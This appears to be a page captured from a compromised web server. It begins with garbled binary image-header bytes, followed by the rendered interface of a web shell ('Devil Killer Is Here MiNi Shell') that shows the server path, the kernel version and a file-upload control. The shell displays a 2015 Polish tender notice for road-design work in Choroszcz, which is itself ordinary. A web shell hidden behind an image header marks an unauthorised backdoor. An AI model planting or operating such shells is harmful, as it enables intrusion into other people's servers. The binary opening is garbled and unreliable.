JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150526/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150526/124620-N-2015.html

<p class="kh_header"><b>Białystok: Opracowanie dokumentacji projektowej na:
Zadanie I. - Przebudowę  drogi powiatowej nr 1552 B  - ulica Sienkiewicza i ulica Branickiego w Choroszczy
Zadanie II. - Przebudowę drogi powiatowej Nr 1552 B - ulica Dominikańska w Choroszczy
Zadanie III. - Przebudowę z rozbudową drogi powiatowej nr 1543 B Czaplino - Niewodnica  Kościelna (Gmina Choroszcz)</b><br>
<b>Numer ogłoszenia: 124620 - 2015; data zamieszczenia: 26.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Białymstoku , Zaścianki, Szosa Baranowicka 37, 15-522 Białystok, woj. podlaskie, tel. (085) 740-21-49, 740-22-17, faks (085) 740-22-19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej na:
Zadanie I. - Przebudowę  drogi powiatowej nr 1552 B  - ulica Sienkiewicza i ulica Branickiego w Choroszczy
Zadanie II. - Przebudowę drogi powiatowej Nr 1552 B - ulica Dominikańska w Choroszczy
Zadanie III. - Przebudowę z rozbudową drogi powiatowej nr 1543 B Czaplino - Niewodnica  Kościelna (Gmina Choroszcz).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej na:
Zadanie I. - Przebudowę  drogi powiatowej nr 1552 B  - ulica Sienkiewicza i ulica Branickiego w Choroszczy
Zadanie II. - Przebudowę drogi powiatowej Nr 1552 B - ulica Dominikańska w Choroszczy
Zadanie III. - Przebudowę z rozbudową drogi powiatowej nr 1543 B Czaplino - Niewodnica  Kościelna (Gmina Choroszcz).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 
 Dla zadania I ,  zadania II - 2 dokumentacji projektowych odpowiadających swoim rodzajem przed-miotowi zamówienia  tj. każda dokumentacja dotyczące projektu budowy lub przebudowy drogi/ulicy o  długości  min. 500,00 m wraz z kanalizacją deszczową o dług. min. 100 m , dla których uzyskano pozwolenie na budowę 
Dla zadania III - 2 dokumentacji projektowych odpowiadających swoim rodzajem przedmiotowi za-mówienia  tj. każda dokumentacja dotyczące projektu budowy lub przebudowy drogi/ulicy o  długości  min. 500,00 m wraz z kanalizacją deszczową o dług. min. 100 m  i jednego projektu budowy lub przebudowy przepustu o średnicy min. 0,8 m , dla których uzyskano pozwolenie na budowę</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do funkcji, jakie zostaną im powierzone. Wykonawca  przedstawi  wraz z ofertą osoby,  które spełniają następujące wymagania:
Dla zadania I, dla zadania II
1)	min.  jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie :
                      -  projektant powinien posiadać  uprawnienia  projektowe w specjalności drogi  (bez 
                         ograniczeń) lub im  równoważne.  
              -  projektant powinien zrealizować min.2 dokumentacje projektowe dotyczące projektu 
 budowy lub przebudowy drogi/ulicy o  długości  min. 500,00 m, dla których uzyskano pozwolenie na budowę 
2)	min jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie
- projektant powinien posiadać  uprawnienia projektowe w specjalności instalacyjnej w
 zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych ,
 wodociągowych i kanalizacyjnych (bez ograniczeń ) lub im równoważne.
Dla zadania III
1)	min.  jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie :
                      -  projektant powinien posiadać  uprawnienia  projektowe w specjalności drogi  (bez 
                         ograniczeń) lub im  równoważne.  
              -  projektant powinien zrealizować min.2 dokumentacje projektowe dotyczące projektu 
 budowy lub przebudowy drogi/ulicy o  długości  min. 500,00 m i jednego projektu budowy lub   przebudowy przepustu o średnicy min. 0,8 m , dla których uzyskano pozwolenie na bu-dowę 
2)	 min jedna osoba proponowana do pełnienia funkcji projektanta posiadająca minimalne kwalifikacje zawodowe, doświadczenie i wykształcenie
- projektant powinien posiadać  uprawnienia projektowe w specjalności instalacyjnej w
 zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych, gazowych ,
 wodociągowych i kanalizacyjnych (bez ograniczeń ) lub im równoważne.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykazać usługi na potwierdzenie spełnienia warunków udziału w postępowaniu.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożnością dotrzymania terminów określonych w formularzu cenowym, termin ten może ulec przedłużeniu, nie więcej jednak, niż o czas trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzd.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie zamawiającego, pokój nr 17 lub za pośrednictwem poczty lub n w/p stronie internetowej..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2015 godzina 09:50, miejsce: W siedzibie zamawiającego, pokój nr 9..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na:
Zadanie I. - Przebudowę  drogi powiatowej nr 1552 B  - ulica Sienkiewicza i ulica Branickiego w Choroszczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący
1.1	Szerokość istniejącej jezdni i korona
Początek opracowania km rob. 0+000 należy założyć na krawędzi nowej nawierzchni bitumicznej na skrzyżowaniu ul. Sienkiewicza i Alei Niepodległości. 
Koniec opracowania  -  km rob. ok. 1+200 założono na skrzyżowaniu ul. Branickiego i ul. Rynek  
- jezdnia ulic z m.m.a., szer. jezdni: ul. Sienkiewicza 7,0m, ul. Branickiego 6,0m, przekrój uliczny.
1.2	Rodzaj i stan istniejącej jezdni wykorzystywanej jako podbudowa
Przewidzieć nową konstrukcję jezdni; destrukt bitumiczny przewidzieć do wykorzystania, po przekruszeniu, na doziarnienie kruszywa na podbudowę.
1.3	Sytuacja trasy
Ulice zagospodarowane - nie przewiduje się drastycznych korekt przebiegu trasy.
1.4	Niweleta drogi
Niweleta drogi wymaga niewielkich korekt.
1.5	Stan rowów i innych urządzeń odwadniających.
Ulice wyposażone w sieci kanalizacji deszczowej - stan niezadowalający.    
1.6	Urządzenia obce w pasie drogowym
- gazociąg wraz z przyłączami, 
- wodociąg wraz z przyłączami,
- kanalizacja sanitarna wraz z przyłączami
- linia energetyczna napowietrzna
- sieć telefoniczna (w tym światłowodowa)
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	 Parametry techniczne do projektowania:
 2.2.1   Prędkość projektowa Vp - 40 lub 30 km/h - teren zabudowany
 2.2.2   Kategoria drogi		- L
 2.2.3	  Przekrój normalny - uliczny, szerokość jezdni bez zmian. Szerokość chodników - do ustalenia  na roboczo z Zamawiającym.
2.2	      Konstrukcja (technologia) nawierzchni
2.2.1	Kategoria ruchu - należy określić na podstawie prognozy ruchu w 10 roku eksploatacji przyjmując 2016 rok za rok wyjściowy i dane z przeprowadzonych pomiarów ruchu.
2.2.2	Podbudowa: ul. Sienkiewicza - kruszywo naturalne/ łamane stabilizowane mechanicznie doziarnione destruktem z frezowania istniejącej jezdni bitumicznej; ul. Branickiego - dwie wersje: 1) kruszywo naturalne/ łamane stabilizowane mechanicznie doziarnione destruktem z frezowania istniejącej jezdni bitumicznej; 2) chudy beton
2.2.3	Nawierzchnia: beton asfaltowy; i druga wersja dla ul. Branickiego - kostka granitowa,
2.2.4	Krawężniki betonowe 20x30cm, na zjazdach najazdowe 20x30cm
2.2.5	Chodniki i zjazdy gospodarcze z kostki betonowej typu Polbruk
2.2.6	Zjazdy publiczne o nawierzchni bitumicznej jak na drodze głównej; i druga wersja dla ul. Branickiego - kostka granitowa.
2.3	Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu
Wymiana sieci kanalizacji deszczowej  z zastosowaniem właściwych prefabrykatów.   
      Ewentualna korekta skrzyżowań z drogami gminnymi.  
2.4	Propozycje dotyczące zadrzewienia
Nie przewiduje się wycinki drzew i krzewów.  
2.5	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy urządzeń obcych.  W przypadku stwierdzenia kolizji, ustalić z Zamawiającym zakres prze-łożenia urządzeń obcych oraz formę zapłaty za opracowanie branżowe.
3.	ZAKRES OPRACOWANIA
3.1	Opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnienia do pozwolenia na budowę (przewiduje się uzyskanie dofinansowania ze środków UE na realizację zadania). Projekt wykonać na aktualnej mapie do celów projektowych w skali 1:500. Tytuł projektu budowlanego uzgodnić z Zamawiają-cym. Gmina Choroszcz posiada miejscowy plan zagospodarowania przestrzennego.
Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  	porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich, rowów przydrożnych, ogrodzeń trwałych i nietrwałych,
- obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego,
- wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych),
-  opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Białymstoku.
Zamawiający wymaga, aby do mapy do celów projektowych były dołączone dokumenty dotyczące lokalizacji i rzędnych reperów państwowych/roboczych, w odniesieniu do których określono rzędne wykazane na mapie oraz układu odniesienia.
 3.2	Dodatkowo należy opracować:
- badania geotechniczne podłoża nawierzchni wykonane co 100m, a w przypadku gruntów  wątpliwych z częstotliwością umożliwiającą opracowanie przekroi geologicznych
- projekt stałej organizacji ruchu (oznakowanie pionowe i poziome).
- pomiary ruchu i prognozę ruchu na 20 lat

Dokumentację należy przekazać: 
a. Mapa do celów projektowych w skali 1:500              - 1 egz.
b. Projekt budowlany					    - 4 egz.
c. Projekt wykonawczy (techniczny) branża drogowa z częścią przedmiarową i ST 	- 5 egz.
d. Projekt wykonawczy (techniczny) branża sanitarna (kanalizacja deszczowa) 
 z częścią przedmiarową i ST	                                         - 5 egz.
e. Badania geotechniczne podłoża nawierzchni		          -2 egz.
f. Projekt stałej organizacji ruchu	   		                 - 4 egz.
g. Pomiary ruchu i prognoza ruchu                                    - 2 egz.
 
Obowiązuje wersja elektroniczna całej dokumentacji projektowej - 1 płyta
Obowiązuje przedstawienie do dnia 31.07.2015r. koncepcji w wersji elektronicznej zawierającej rozwiązania sytuacyjne, wysokościowe i konstrukcję jezdni, do której Zamawiający ustosunkuje się w ciągu pięciu dni roboczych.
Pozostałe Wymagania w stosunku do dokumentacji projektowej podano w Rozdziale 6.
3.3. Terminy przekazania Zamawiającemu elementów zamówienia zostały określone w formularzu cenowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej na: Przebudowę drogi powiatowej Nr 1552 B - ulica  Dominikańska  w Choroszczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stan istniejący
1.1	Szerokość istniejącej jezdni i korona
Początek opracowania km rob. 0+000 należy założyć na skrzyżowaniu ul. Dominikańskiej i ul. Rynek. 
Koniec opracowania  -  km rob. ok. 0+380  
- jezdnia ulicy z m.m.a., szer. jezdni 7,0m, przekrój uliczny.
1.2	Rodzaj i stan istniejącej jezdni wykorzystywanej jako podbudowa
Przewidzieć nową konstrukcję jezdni; destrukt bitumiczny przewidzieć do wykorzystania, po przekruszeniu, na doziarnienie kruszywa na podbudowę.
1.3	Sytuacja trasy
Ulica zagospodarowana - nie przewiduje się drastycznych korekt przebiegu trasy.
1.4	Niweleta drogi
Niweleta drogi wymaga korekt.
1.5	Stan rowów i innych urządzeń odwadniających.
Ulica wyposażona w sieć kanalizacji deszczowej - stan niezadowalający.    
1.6	Urządzenia obce w pasie drogowym
- gazociąg wraz z przyłączami, 
- wodociąg wraz z przyłączami,
- kanalizacja sanitarna wraz z przyłączami
- linia energetyczna napowietrzna
- sieć telefoniczna (w tym światłowodowa)
2.	DANE WYJŚCIOWE DO PROJEKTOWANIA
2.1	Parametry techniczne do projektowania:
2.2.1  Prędkość projektowa Vp - 40 lub 30 km/h - teren zabudowany
2.2.2  Kategoria drogi		- L
2.2.3 	Przekrój normalny - uliczny, szerokość jezdni bez zmian. Obustronna ścieżka rowerowa z dopusz-czeniem ruchu pieszego na długości nie wymagającej poszerzenia pasa drogowego.             
2.2	Konstrukcja (technologia) nawierzchni
2.2.1	Kategoria ruchu - należy określić na podstawie prognozy ruchu w 10 roku eksploatacji przyjmując 2016 rok za rok wyjściowy i dane z przeprowadzonych pomiarów ruchu.
2.2.2	Podbudowa - kruszywo naturalne/ łamane stabilizowane mechanicznie doziarnione destruktem z frezowania istniejącej jezdni bitumicznej.
2.2.3	Nawierzchnia - beton asfaltowy
2.2.4	Krawężniki betonowe 20x30cm, na zjazdach najazdowe 20x30cm
2.2.5	Ścieżka rowerowa i zjazdy gospodarcze z kostki betonowej typu Polbruk bez faski.
2.2.6	Zjazdy publiczne o nawierzchni bitumicznej jak na drodze głównej,
2.3	Propozycje dotyczące odwodnienia i bezpieczeństwa ruchu
Wymiana sieci kanalizacji deszczowej  z zastosowaniem właściwych prefabrykatów.   
     Ewentualna korekta skrzyżowań z drogami gminnymi.  
2.4	Propozycje dotyczące zadrzewienia
Nie przewiduje się wycinki drzew i krzewów.  
2.5	Propozycje przebudowy (zabezpieczenia) urządzeń towarzyszących
Nie przewiduje się przebudowy urządzeń obcych.  W przypadku stwierdzenia kolizji, ustalić z Zamawiającym zakres prze-łożenia urządzeń obcych oraz formę zapłaty za opracowanie branżowe. Regulacji, wymiany pokryw i zastosowania pierścieni odciążających będą wymagały studnie rewizyjne kanalizacji sanitarnej.
3.	ZAKRES OPRACOWANIA
3.1	Opracować wszystkie niezbędne materiały i uzyskać wszystkie uzgodnienia do pozwolenia na budowę (przewiduje się uzyskanie dofinansowania ze środków UE na realizację zadania). Projekt wykonać na aktualnej mapie do celów projektowych w skali 1:500. Tytuł projektu budowlanego uzgodnić z Zamawiają-cym. Gmina Choroszcz posiada miejscowy plan zagospodarowania przestrzennego.
Prawidłowe wykonanie mapy obejmuje następujące czynności:
-  porównanie istniejącej mapy z terenem i naniesienie na nią istniejących i projektowanych elementów infrastruktury technicznej oraz obiektów inżynierskich, rowów przydrożnych, ogrodzeń trwałych i nietrwałych,
- obliczenie współrzędnych punktów granicznych do wkartowania na mapę pasa drogowego,
-  wykonanie pomiarów aktualizacyjnych (sytuacyjno - wysokościowych),
-  	opracowanie mapy sytuacyjno - wysokościowej w skali 1:500
- 	rejestracja opracowania w Powiatowym Ośrodku Dokumentacji Geodezyjno - Kartograficznej w Białymstoku.
Zamawiający wymaga, aby do mapy do celów projektowych były dołączone dokumenty dotyczące lokalizacji i rzędnych reperów państwowych/roboczych, w odniesieniu do których określono rzędne wykazane na mapie oraz układu odniesienia.
 3.2	Dodatkowo należy opracować:
- badania geotechniczne podłoża nawierzchni wykonane co 100m, a w przypadku gruntów  wątpliwych z częstotliwością umożliwiającą opracowanie przekroi geologicznych
- projekt stałej organizacji ruchu (oznakowanie pionowe i poziome).
- pomiary ruchu i prognozę ruchu na 20 lat
Dokumentację należy przekazać: 
